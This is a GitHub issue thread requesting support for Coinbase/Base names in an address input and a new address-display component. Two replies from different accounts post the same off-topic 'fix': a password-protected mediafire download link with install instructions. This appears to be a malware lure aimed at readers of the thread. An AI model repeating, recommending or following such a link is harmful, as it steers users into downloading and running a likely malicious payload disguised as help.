### ISSUE TITLE
Support for Coinbase Names

### ISSUE THREAD

**Issue by julien51** [unlock-protocol/unlock#14466]
We have a `AddressInput` component that supports ENS and cb.id names. We need to also add support for Base names!

Additionally, we have a `useENS` hook that changes addresses into ENS in the UI. Let's create a dedicated `<Address>` component that not only tries to resolve ENS, but also supports `cb.id` and Base names.

Then let's use that component in the app anywhere a wallet address is displayed.

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
